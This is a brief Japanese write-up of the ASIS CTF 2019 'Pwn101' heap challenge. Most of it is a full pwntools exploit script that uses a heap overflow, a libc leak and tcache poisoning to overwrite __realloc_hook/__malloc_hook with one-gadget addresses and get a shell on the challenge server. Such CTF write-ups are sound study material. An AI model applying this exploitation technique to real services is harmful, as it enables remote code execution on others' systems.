ASIS CTF quals 2019 Pwn101
事前調査
なんかごちゃごちゃやってても全然SEGVしてくれないので、多分tcacheの実装された問題だということがわかります。
さらに、Heap Over Flowがあることがわかります。next chunk sizeを変えれます。
Exploit
後は適当に解きます。
malloc_hook (ではうまくいかなかったので、realloc_hookと組み合わせた)にonegadget RCEでフィニッシュです。
from pwn import * context.log_level = "debug" def add_address(desc_len, phone_number, name, description): conn.sendlineafter("> ", "1") conn.sendlineafter("Description Length: ", str(desc_len)) conn.sendlineafter("Phone Number: ", str(phone_number)) conn.sendafter("Name: ", name) conn.sendafter("Description: ", description) def show_address(index): conn.sendlineafter("> ", "2") conn.sendlineafter("Index: ", str(index)) def delete_address(index): conn.sendlineafter("> ", "3") conn.sendlineafter("Index: ", str(index)) def exploit(): add_address(0x30, 0, "A", "A" * 0x30) add_address(0x40, 0, "A", "A" * 0x40) add_address(0xf30, 0, "A", "A" * 0x130) add_address(0xf30, 0, "A", "A" * 0x130) add_address(0xf30, 0, "A", "A" * 0x130) add_address(0x230, 0, "A", "A" * 0x230) delete_address(0) delete_address(2) delete_address(3) delete_address(4) add_address(0x38, 0, "A", "A" * 0x38 + "\xf1") add_address(0xf30, 0, "A", "\x30") show_address(2) conn.recvuntil("Description : ") __MALLOC_HOOK = u64(conn.recv(6) + "\x00\x00") __REALLOC_HOOK = __MALLOC_HOOK - 0x8 LIBC_BASE = __MALLOC_HOOK - 0x3ebc30 log.success("__MALLOC_HOOK: 0x%x", __MALLOC_HOOK) log.success("LIBC_BASE: 0x%x", LIBC_BASE) delete_address(1) add_address(0xe8, 0, "A", "A" * 0x28 + p64(0x51) + p64(__REALLOC_HOOK)) add_address(0x40, 0, "A", "A" * 0x40) add_address(0x40, 0, "A", p64(LIBC_BASE + 0x4f322) + p64(LIBC_BASE + 0x98c3e)) conn.sendlineafter("> ", "1") conn.sendlineafter("Description Length: ", str(0x40)) conn.interactive() if __name__ == "__main__": if len(sys.argv) > 1: HOST = "82.196.10.106" PORT = 29099 conn = remote(HOST, PORT) else: #conn = process(["strace", "./pwn101.elf"]) conn = process(["./pwn101.elf"]) exploit()